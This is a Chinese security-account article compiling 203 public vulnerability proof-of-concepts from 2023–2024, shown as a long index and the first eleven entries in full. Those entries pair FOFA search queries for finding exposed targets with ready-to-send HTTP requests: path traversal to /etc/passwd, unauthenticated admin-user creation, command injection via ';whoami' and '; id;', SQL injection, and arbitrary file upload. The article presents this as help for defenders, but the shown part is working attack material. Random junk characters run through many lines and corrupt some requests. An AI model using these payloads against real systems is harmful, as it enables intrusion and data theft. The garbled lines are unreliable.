互联网公开漏洞整理202309-202406) \8 |( _: M1 H x( A# B( \0 c
道一安全 2024-06-05 07:41 北京! l- Z$ ?$ {7 Z9 a
以下文章来源于网络安全新视界 ,作者网络安全新视界
, @* R' M# i1 K7 F0 e6 |5 L; o a( l( {, ?: t6 I! F& m; ?
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。% X5 _" L5 F" S. M# e: s3 l# a1 A2 A$ U
% M; F! n' y1 N! s4 ~漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。% d3 ?+ k# Q( g f3 R- x2 [
' O' H+ @. z8 a8 e
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
$ _+ X$ x( v0 @7 ?8 G( _6 g6 f+ g4 g8 `0 \# \) G
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。. ]. _# `0 k* Z) ^* F
9 o8 U0 R3 U5 z) o# k; Q- N, X合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
q$ ?7 K) P/ H* S+ A" S2 G; ?9 K: E; M
# m" S* l, U% m! ?0 z4 `0 V0 J
声明
4 B' j9 C* I+ x' d: Z5 H3 p5 T: Y3 O
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
) b. [3 g, d, g+ m3 y1 o
% V; F- h- J( _& C# O有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
* }$ l1 Q8 W1 Q) `5 M
& Z5 v; W5 j% O r' ?0 m+ K: {+ M: \( ^5 b# W M
& x6 R$ F2 ?% P" H% q ^目录
m3 N: ]) a5 _$ Q* i% \, C* e7 U& C. y2 X% t$ ^
01' D6 k! |* y4 @# v
/ \0 C6 |: Y, g0 b/ g
1. StarRocks MPP数据库未授权访问3 P, f' n E" C
2. Casdoor系统static任意文件读取
2 K c5 E6 L8 C3. EasyCVR智能边缘网关 userlist 信息泄漏( m$ K/ s0 | O" v7 |- t
4. EasyCVR视频管理平台存在任意用户添加. L: s4 ?/ U( Y& r
5. NUUO NVR 视频存储管理设备远程命令执行; C0 n. K. V! T7 Q0 h/ ?
6. 深信服 NGAF 任意文件读取
4 Q; b' R+ X/ W1 s- U4 w2 r7. 鸿运主动安全监控云平台任意文件下载; l1 B, ]" L( [( S8 }* Y W
8. 斐讯 Phicomm 路由器RCE" G! K3 Z2 ?% m6 a
9. 稻壳CMS keyword 未授权SQL注入
+ h9 D! c c9 r$ m7 p* `( R10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" c* u1 I: C3 v* `3 h( D3 e# |! O11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入( ~: x4 U9 k. s8 D7 T
12. Jorani < 1.0.2 远程命令执行
6 W% M5 l5 N6 l( R9 n/ P13. 红帆iOffice ioFileDown任意文件读取% _4 n# n# L! _* t
14. 华夏ERP(jshERP)敏感信息泄露) m! C0 L9 e0 t- H" Q7 J! g5 O: P
15. 华夏ERP getAllList信息泄露1 Q0 _! o5 l) }2 A. f9 o6 I
16. 红帆HFOffice医微云SQL注入: T" b2 Q; p$ A3 C
17. 大华 DSS itcBulletin SQL 注入- c: u) }# n* F( t8 X7 t
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露1 ]- _- R7 W: H. ~
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* I, H# E1 K3 h% p- L4 {% j20. 大华ICC智能物联综合管理平台任意文件读取
& O' I& Q. }( J% r: d8 M" G21. 大华ICC智能物联综合管理平台random远程代码执行8 j# a4 a2 `0 K8 p% x/ _- ^
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
; g# {. I" u3 }8 R23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 E6 \$ b5 b7 g" c. n5 J" c24. 用友NC 6.5 accept.jsp任意文件上传, ?8 n2 y) D6 B% d r: i. d
25. 用友NC registerServlet JNDI 远程代码执行
) x( x: i- Q7 w. G1 ?* a2 R0 O- c; h26. 用友NC linkVoucher SQL注入
& E" B, K5 W8 p, u) m* I0 O27. 用友 NC showcontent SQL注入
. _/ M# J4 F0 U4 _1 C- M; \2 X28. 用友NC grouptemplet 任意文件上传- w! G: C) Y- x5 E9 o
29. 用友NC down/bill SQL注入4 k, ]9 r5 H9 e8 d
30. 用友NC importPml SQL注入
- p' X' Q% A2 ~( z31. 用友NC runStateServlet SQL注入& h4 I0 W* n2 |9 E0 o
32. 用友NC complainbilldetail SQL注入
! e# h( Z2 \" B: A: O) { B33. 用友NC downTax/download SQL注入
* ]# y/ q( R' V; @3 Z1 k) w o- b34. 用友NC warningDetailInfo接口SQL注入( v4 E: i, |7 ]+ J$ T! n6 R8 F1 v
35. 用友NC-Cloud importhttpscer任意文件上传
: P, u- {6 g2 x6 ]4 I36. 用友NC-Cloud soapFormat XXE' y1 H, L% ]7 }: l/ N
37. 用友NC-Cloud IUpdateService XXE
* V# P; {2 `3 N38. 用友U8 Cloud smartweb2.RPC.d XXE
. ^9 r/ z8 i; k) ^* o39. 用友U8 Cloud RegisterServlet SQL注入3 T4 [& [* g& {: Y; h( S
40. 用友U8-Cloud XChangeServlet XXE
$ Y) x) \# c8 E. t6 B* F' s* P41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" o3 b& k- R1 b6 J42. 用友GRP-U8 SmartUpload01 文件上传
4 v1 f7 N) L; S1 x, j43. 用友GRP-U8 userInfoWeb SQL注入致RCE
3 T3 y3 r& h7 _44. 用友GRP-U8 bx_dj_check.jsp SQL注入, x' n% I3 b# w# D# K/ U" V
45. 用友GRP-U8 ufgovbank XXE
- R! `' }$ t; D9 S7 P46. 用友GRP-U8 sqcxIndex.jsp SQL注入' n N% l2 c! C6 ?+ u
47. 用友GRP A++Cloud 政府财务云 任意文件读取. @* a/ v6 Q6 I3 s
48. 用友U8 CRM swfupload 任意文件上传
5 P( R% |) L1 c) @+ R5 t7 D49. 用友U8 CRM系统uploadfile.php接口任意文件上传
) U$ w' k$ N7 [+ i50. QDocs Smart School 6.4.1 filterRecords SQL注入 _; `" K; m! a
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入7 q4 i0 p' [: b4 B
52. 泛微E-Office json_common.php sql注入5 `% Q7 d4 F( e y1 p
53. 迪普 DPTech VPN Service 任意文件上传( |2 H$ P& N: P2 I7 `4 Y) q$ t
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 X6 s, T8 g, Y4 c55. 畅捷通T+ getdecallusers信息泄露) d0 R1 g a) q3 W( _2 H( |* z
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE' ^$ l. s, Y5 i/ T) G+ [1 d
57. 畅捷通T+ keyEdit.aspx SQL注入
4 V8 I6 z) x H% |/ j N58. 畅捷通T+ KeyInfoList.aspx sql注入
0 c' K& N* o0 E0 o, E59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 u' w: G) S/ Z7 G/ ~) F
60. 百卓Smart管理平台 importexport.php SQL注入9 k, `9 D$ a2 m
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传 x) I8 C, q a6 ]) a- c9 ?
62. IP-guard WebServer 远程命令执行' f) ]1 M- T, @# ^( x) v& n! L
63. IP-guard WebServer任意文件读取
8 `, i. Q" A: X: I6 t& Z9 s/ v64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ z* h! h1 ^6 k; e o65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过* c z5 ?( Z. \9 K( w
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: W5 h5 ?9 Z* f+ }; B T67. 万户ezOFFICE wpsservlet任意文件上传
T4 H! O0 f: ]* t% S% u# c68. 万户ezOFFICE wf_printnum.jsp SQL注入
, \/ L' L, |( f) s5 [69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 X: L' r+ p' \. f, b% C7 B70. 万户ezEIP success 命令执行
$ B$ y9 L' m; ` T* Q' k71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入; A* O& t# m0 [; V% w
72. 致远OA getAjaxDataServlet XXE' m) Y4 ]: A) L
73. GeoServer wms远程代码执行$ D; N5 r: h* T! Q: l* d. b* q( S( Q
74. 致远M3-server 6_1sp1 反序列化RCE
0 z; e7 }5 x/ U75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& |( @' x% L: L" D' o6 z/ t
76. 新开普掌上校园服务管理平台service.action远程命令执行4 {$ N/ B: @4 I) ]- a. S _8 l, W$ L
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
4 R$ \0 }/ P$ L( d; t78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传: j# L/ E. r/ a8 a5 U
79. BYTEVALUE 百为流控路由器远程命令执行
+ a% D( A) _; i80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传7 x E6 V+ R1 A
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露+ [& x% s x8 j
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
! C- ^+ y+ u- Z7 M, a$ \83. JeecgBoot testConnection 远程命令执行8 @, }* | y9 f$ Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- {( \1 a4 |, [' ^& w9 y* e85. SysAid On-premise< 23.3.36远程代码执行. W' L4 C' m; L4 l9 c* w
86. 日本tosei自助洗衣机RCE
) A( ?' a0 F& W# Y! [7 }87. 安恒明御安全网关aaa_local_web_preview文件上传4 }) Y' B- P1 h H4 v2 x9 t' M
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
/ ^1 v, L! ^5 E+ b! b' G9 H89. 致远互联FE协作办公平台editflow_manager存在sql注入) n/ u6 i' n8 e" r. v: T5 _) |# D
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行/ d$ S' N4 S- R: |8 q
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: [( k6 d# Z$ s
92. 海康威视运行管理中心session命令执行
% n/ t a' i8 a/ V5 Y93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传1 D% U- [2 w: i5 H* M
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 s$ A2 n: ]. G" W95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行" d8 R& V! n9 [* `
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# C( W/ u% b5 E97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行8 B* f" E9 b3 n+ `9 o2 V
98. SpiderFlow爬虫平台远程命令执行. ?1 I) v K* i$ j9 _
99. Ncast盈可视高清智能录播系统busiFacade RCE5 j# t$ g0 _% k' U$ `/ O- `
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传" P7 @& z+ m/ H* i, W
101. ivanti policy secure-22.6命令注入- G' `3 g1 Z4 }; V# W- p
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行: Q, q6 E# W) F& L$ d
103. Ivanti Pulse Connect Secure VPN XXE
0 C! f8 E; R5 f F) y7 `2 r104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
U% x* T" D; k( g; I M7 U, u4 K105. SpringBlade v3.2.0 export-user SQL 注入: V5 R! q( V0 n' b* Z+ N
106. SpringBlade dict-biz/list SQL 注入' o' l9 n5 r, o4 w6 Y% \+ P
107. SpringBlade tenant/list SQL 注入
! F+ V [) F. Z8 g3 n) y) p108. D-Tale 3.9.0 SSRF X+ R! E; c+ X% Q
109. Jenkins CLI 任意文件读取2 T# e9 F6 k7 Y/ C) r
110. Goanywhere MFT 未授权创建管理员
$ M) R# S5 k7 w" v/ ]111. WordPress Plugin HTML5 Video Player SQL注入4 o& O( C* U) W8 U
112. WordPress Plugin NotificationX SQL 注入
$ W/ o4 s5 r' f$ i9 f' o3 i113. WordPress Automatic 插件任意文件下载和SSRF
* V: ?) {3 h* o3 c114. WordPress MasterStudy LMS插件 SQL注入
% W. `# g5 O! y% j115. WordPress Bricks Builder <= 1.9.6 RCE A% J" u2 p4 i
116. wordpress js-support-ticket文件上传
1 o6 x& w0 a" M1 N117. WordPress LayerSlider插件SQL注入7 u% x; S3 \6 x6 K. Z! I
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传6 X2 Z B3 i d2 d( C; j) B
119. 北京百绰智能S20后台sysmanageajax.php sql注入 @9 ~1 U1 U( S( A1 `3 `) l; O2 K
120. 北京百绰智能S40管理平台导入web.php任意文件上传/ y' u8 o7 ^, f. r( M- E$ H
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
1 Z5 _" @' f3 `( o& j122. 北京百绰智能s200管理平台/importexport.php sql注入
! L9 }1 I$ G0 \4 f9 S" `* d' p123. Atlassian Confluence 模板注入代码执行
, a a/ ~# C- z$ m) ?$ }. z, t8 s* [124. 湖南建研工程质量检测系统任意文件上传1 S6 O' s, U# q1 ?( g8 ]
125. ConnectWise ScreenConnect身份验证绕过
/ t# `# P# I4 @0 l126. Aiohttp 路径遍历+ A7 _% S2 z" P( F3 [# u) G
127. 广联达Linkworks DataExchange.ashx XXE1 ^4 V- U% \8 s- T) q. O3 G
128. Adobe ColdFusion 反序列化
& m1 Q- r7 f5 B6 _" R129. Adobe ColdFusion 任意文件读取; K. Q! g% V1 E- r0 `, J
130. Laykefu客服系统任意文件上传: d$ L# M8 v6 N
131. Mini-Tmall <=20231017 SQL注入
- V1 Y% ] T; O- J3 z3 s/ @4 k132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 P1 L. U- x* ]133. H5 云商城 file.php 文件上传3 C7 m: X6 r( ?( F) w9 @" {
134. 网康NS-ASG应用安全网关index.php sql注入. G [5 B- m3 c5 y; X
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" t# H6 e0 y3 E4 \' l
136. NextChat cors SSRF
% h& y" C: f* E9 {137. 福建科立迅通信指挥调度平台down_file.php sql注入0 h3 V5 h" U% I9 L8 q7 T8 O
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入2 r' @& E* @0 x& }
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
4 x4 B# r4 U/ ^+ s$ d' z% y! x140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入9 h/ a8 F/ k( C2 M b
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- d: k( K) e2 _0 N142. CMSV6车辆监控平台系统中存在弱密码
8 j7 [' i$ T! S8 d5 z' H: H2 [143. Netis WF2780 v2.1.40144 远程命令执行
" J) R: P+ v! c& ~8 d144. D-Link nas_sharing.cgi 命令注入 M5 t8 x4 E: ^& G, e: D
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, ~: r0 x) l! h5 c4 ~; f$ w4 `
146. MajorDoMo thumb.php 未授权远程代码执行
: u+ g4 ]. \% W4 A* r147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& E1 w* T" i" z2 k( n' l
148. CrushFTP 认证绕过模板注入0 W% l4 N2 I7 F5 D* L
149. AJ-Report开源数据大屏存在远程命令执行
4 `4 q U9 K( w; s( ]! f0 J150. AJ-Report 1.4.0 认证绕过与远程代码执行
: J/ v% e |$ F6 F, T151. AJ-Report 1.4.1 pageList sql注入$ k& Y7 u: M l+ h1 t/ `6 x
152. Progress Kemp LoadMaster 远程命令执行) f! I& r: l8 |' l9 n
153. gradio任意文件读取4 x) {: a# B- G* B' T; W1 Q
154. 天维尔消防救援作战调度平台 SQL注入
; U4 ~9 A! P$ p/ I" \9 L155. 六零导航页 file.php 任意文件上传
' s; d2 w# T* ~8 w# F156. TBK DVR-4104/DVR-4216 操作系统命令注入
: a% E# W' ?3 N/ o9 G0 C2 p# v157. 美特CRM upload.jsp 任意文件上传
. A. S9 g9 X4 b158. Mura-CMS-processAsyncObject存在SQL注入% v) z( R+ M: \! C# f% W
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
$ u6 x9 e$ T' i! _. T160. Sonatype Nexus Repository 3目录遍历与文件读取
3 Q$ `8 c- O: w8 e' B# o( Z161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
( @1 v7 _* I& o* z9 J% I$ _162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# v' @0 H I) S! B
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传, f" d7 i1 O6 `/ Z# k( [
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传 S: p/ a) ]" N% N
165. OrangeHRM 3.3.3 SQL 注入
7 X* b$ p8 p) g) w, F- |7 V8 v) D166. 中成科信票务管理平台SeatMapHandler SQL注入
: R" [& g/ k& j; G5 t9 }" R167. 精益价值管理系统 DownLoad.aspx任意文件读取. J3 r1 N7 ^/ v W; m6 t
168. 宏景EHR OutputCode 任意文件读取
, P. k9 |5 d* A8 Q! w! t169. 宏景EHR downlawbase SQL注入
3 f- V5 q+ P3 E1 b5 a7 k170. 宏景EHR DisplayExcelCustomReport 任意文件读取
( j# n. w& n- k" _6 M3 w4 \+ y171. 通天星CMSV6车载定位监控平台 SQL注入) E2 L7 {& j( k( ?
172. DT-高清车牌识别摄像机任意文件读取+ F2 G& e/ }9 X8 E5 t
173. Check Point 安全网关任意文件读取/ c# Y2 Y5 s: U6 K9 l/ { C; A: u
174. 金和OA C6 FileDownLoad.aspx 任意文件读取' [: j# M$ {, z! Z, _
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
- C4 @7 }8 Y. }5 X+ t- K176. 电信网关配置管理系统 rewrite.php 文件上传
, M$ c: z2 L/ B/ L$ W; e177. H3C路由器敏感信息泄露
# i) y/ h: l6 w178. H3C校园网自助服务系统-flexfileupload-任意文件上传% f4 _ Y. h# v
179. 建文工程管理系统存在任意文件读取
' a! W0 |" F: w q! d! R180. 帮管客 CRM jiliyu SQL注入, q) o) B/ o- |% i: r2 H
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# |- @; ~6 \2 \% P! n h, Q182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 _ s3 E1 b; X8 t7 S0 M
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
6 Q1 W" q9 a' j7 z184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* E$ b T' d! F8 V! o185. 瑞友天翼应用虚拟化系统SQL注入6 } G' l3 r' W. q* m
186. F-logic DataCube3 SQL注入5 Z" k: W% V t: ^! o0 g9 W
187. Mura CMS processAsyncObject SQL注入% D2 q5 ^/ T$ O
188. 叁体-佳会视频会议 attachment 任意文件读取6 ^" i8 I: ?- H
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 f. k( B- K& Q6 l, O190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 k1 [; ~9 {. u7 I191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入( Q1 W8 ?. J7 c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传/ t' ]5 r- j" c* e9 ^& O$ N
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 Q' T8 a' B( `$ |) i$ H% m' {& N# k
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
" _' N1 B% C( S# o$ E195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 k8 q0 y) I# k) j X+ G0 a196. 河南省风速科技统一认证平台密码重置) e$ d# T( Q, Y
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入5 i0 r4 M: N9 p* D4 Q" C
198. 阿里云盘 WebDAV 命令注入
6 D2 X7 I. z; @2 C199. cockpit系统assetsmanager_upload接口 文件上传
- a1 r# u5 B2 V1 q: U3 n200. SeaCMS海洋影视管理系统dmku SQL注入- i9 O+ m5 n( P- p, M
201. 方正全媒体新闻采编系统 binary SQL注入( O9 ^/ ] S- d; e8 E+ e7 y
202. 微擎系统 AccountEdit任意文件上传
' `2 b z1 ]1 V203. 红海云EHR PtFjk 文件上传
# J8 E, g( i* I0 `- s# Z# q! a5 Y3 _+ I. Z% m, d9 T6 |
POC列表1 S3 b' e) y3 a
! I0 I9 Y* S6 K! J0 K/ b: Z
02
0 G" a" O( |7 @) s! J; D2 e/ }+ d. V/ h' W
1. StarRocks MPP数据库未授权访问" _& U1 v9 L) |3 X
FOFA :title="StarRocks"
; z3 X) V2 J; o+ ]. X. bGET /mem_tracker HTTP/1.1# F2 z# f6 n, x9 P+ L, y* h& o0 [
Host: URL: V+ v, T, ]' H) y
: s! l" `* \: J7 Z3 k
& u( d% r6 L% j
2. Casdoor系统static任意文件读取* l: {- q( w+ S2 N* K6 y- h+ k% X
FOFA :title="Casdoor". w1 a- E6 a7 X- I- G' W
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" H: V# l5 z3 m$ i- x/ {
Host: xx.xx.xx.xx:9999$ x4 ~9 p, D0 h7 o' K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Z, `. v7 l u. }' G0 E# ZConnection: close
7 N9 ]" h4 U/ G) o! t. \; fAccept: */*9 c* L& U1 I0 p$ x/ d
Accept-Language: en( n( L( Q7 W. n, P
Accept-Encoding: gzip; F, G5 W3 f8 O% x' m% t
7 l5 o3 V9 W# ~& [9 n/ h( C/ e6 l3 n, m1 ?' J: x
3. EasyCVR智能边缘网关 userlist 信息泄漏
w7 U" |$ C& m' vFOFA :title="EasyCVR"+ ^. f" C1 t: W$ w
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
6 r# ?& v( `) y; k* R6 O( o$ U4 fHost: xx.xx.xx.xx
' J n F' y/ [3 n3 P
, m# c$ L6 i8 r. u) @2 ^& A, R4 M6 S
4. EasyCVR视频管理平台存在任意用户添加0 v X6 S5 ~* A+ `. A" d2 Y8 w
FOFA :title="EasyCVR"+ |$ w5 a1 P9 n% g
, V3 K7 G; n7 L" k- m) M
password更改为自己的密码md52 l" V3 e0 \, ~- f
POST /api/v1/adduser HTTP/1.1* I. q; j3 I9 ?8 `. h# Y
Host: your-ip5 |) I3 S3 C7 [2 R9 Q2 s3 c
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2 X( k$ N9 V. y7 L# l. ~" t8 w
: Z- J8 n+ q; ?& q1 Ename=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
) Y& p$ c2 F# H
; g. ]1 M6 a; K& k8 |
4 ]. q1 s: Y% L$ o5. NUUO NVR 视频存储管理设备远程命令执行* @+ _4 [$ _0 h% N$ P
FOFA:title="Network Video Recorder Login": X% m) a& C# b, F7 V
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: g0 ]4 M1 U- d" D0 pHost: xx.xx.xx.xx
8 P6 p) h, l* }# T' r# ]8 q; I6 |& X
8 ^# T5 h7 U0 F+ A: e+ r- }; ]
+ `0 M& ^. Z5 }' ~7 _ q' X0 M6. 深信服 NGAF 任意文件读取
& V5 \5 b) d$ R' U* ~+ HFOFA:title="SANGFOR | NGAF"0 k) I* E1 q& o# t% @
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1% m. c3 J* f: G8 Z9 g/ ~
Host:7 c4 o" Z" _4 G
+ L0 I+ a' y9 Q6 P X; ^4 x1 \
7 O+ P$ P' W, Z* U$ G% h
7. 鸿运主动安全监控云平台任意文件下载
0 j' ?9 A8 j' xFOFA:body="./open/webApi.html"' b+ F% P2 h. F
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
* v& @/ n' X- Z' v# Q+ }/ WHost:
/ Y- D2 m1 N& u
; V/ \4 a3 U% V" p/ u+ U
7 e1 ~2 o# x$ v$ P8. 斐讯 Phicomm 路由器RCE
0 f" Y! z% L" d1 mFOFA:icon_hash="-1344736688"( a# x7 e1 i8 k0 f. U# V$ x) a
默认账号admin登录后台后,执行操作; u" C F: M+ o
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1" O9 G$ M4 }0 C* [+ k
Host: x.x.x.x) |& ?- J! M; ]
Cookie: sysauth=第一步登录获取的cookie
( V! m; x+ @4 o% g/ g6 s0 W; r7 EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz: b3 R6 h& Y; y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 p/ h/ @8 K9 F5 a; h/ \
* V. g6 q+ I O% e [8 m5 h
------WebKitFormBoundaryxbgjoytz
* B! J* x! a; d4 N$ c" W {Content-Disposition: form-data; name="wifiRebootEnablestatus"
7 D9 X8 Y3 \6 l D- W
* e) i0 i! G* e/ ~7 E* R, z%s/ G5 ?" {8 q5 s$ f+ W5 e8 i7 g
------WebKitFormBoundaryxbgjoytz( `& i) `$ A) B7 G8 G P" P
Content-Disposition: form-data; name="wifiRebootrange"# b$ E1 @1 N6 g4 ^& _* P
0 E, {+ O t y# o# V
12:00; id;, K/ k& M0 B3 ^; L, |1 a
------WebKitFormBoundaryxbgjoytz
' f1 Z9 E5 H# ]' `Content-Disposition: form-data; name="wifiRebootendrange"
1 W8 [' j* X; a4 W, j+ N P$ W, [; d
%s:
, w: D% |7 G& L+ G* H9 Q. X, ?------WebKitFormBoundaryxbgjoytz
# W) b K9 L# y/ M6 _1 }% dContent-Disposition: form-data; name="cururl2"
9 x0 D2 L8 U) d1 O7 |
" N$ W9 s, z8 {. X+ _, q1 Y% ~# w4 K' Z4 \1 k4 m' [2 h
------WebKitFormBoundaryxbgjoytz--2 c ]& A' r6 t$ [: J
' Z& y5 \, b% Q: z
! A- s8 |' K9 z3 J9. 稻壳CMS keyword 未授权SQL注入
& @! L9 C3 t. F9 qFOFA:app="Doccms"
! ^4 J5 V' K- y, v* S9 FGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.17 ]# @: a+ ~* H) X6 G* e1 X2 Q) S* p
Host: x.x.x.x
8 U( } e) L- R7 E$ R( {4 H1 _+ ]4 v
+ i) { @1 i' M) G6 R1 {' ~0 V8 P+ E; b0 O1 B, ?* c+ u
payload为下列语句的二次Url编码! S/ i# e$ h' |$ O7 G* h8 N
. K7 W) ^0 H- r2 @7 W& g
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
# R1 O4 [6 u0 G; Y
* V* \. Y/ p9 \; n/ B O10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 J' a/ k) U& H. h$ @
FOFA:icon_hash="953405444"2 t$ P2 N" U* z9 ?8 {
, s+ g$ D$ j& n6 x
文件上传后响应中包含上传文件的路径
" H. ^8 V# n6 e `+ jPOST /eis/service/api.aspx?action=saveImg HTTP/1.1& U/ W7 C+ P( i- j
Host: x.x.x.x:xx
( f+ d( J. q) t( A8 v4 Y' o4 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
7 r, I" P7 |4 g9 M3 aContent-Length: 1971 r6 k' P E4 @4 d, P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. s5 M m& A) _# N% r! V! KAccept-Encoding: gzip, deflate8 d3 i& s B' E6 x! H
Accept-Language: zh-CN,zh;q=0.9: X) [& I5 w1 V3 [; R
Connection: close" J& G6 f. I( V7 k+ B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 z% } w; B7 Z1 I2 ]7 Y" e6 G/ v
: n4 ^1 ]' v4 t------WebKitFormBoundaryxdgaqmqu; A) q) c1 d) V8 z2 Y- H& w" j5 Q! y
Content-Disposition: form-data; name="file"filename="icfitnya.txt") R; G0 M2 b( r
Content-Type: text/html
! e2 b" C' n3 S y. F# d- k' k# M) q7 @0 w
jmnqjfdsupxgfidopeixbgsxbf) c# u5 r) H$ ?2 A; e R0 v
------WebKitFormBoundaryxdgaqmqu--
1 D3 w* E I; K9 j, n3 o$ Z" t
5 h& f S q4 L; g. h
2 I4 _4 s0 |, X/ Y) R$ v) X8 Z11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
( n8 M, N/ ]( c) y4 n NFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"5 h+ o$ j! i$ T. ~
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
. r* Y7 W' B* e1 Q* }: MHost: 127.0.0.1
- O( r4 o$ Q) X' ?7 }# _Pragma: no-cache
3 N$ w. f! C# X8 g1 l0 ]( e4 QCache-Control: no-cache! y9 Y2 v9 @7 B: y) G3 D
Upgrade-Insecure-Requests: 1
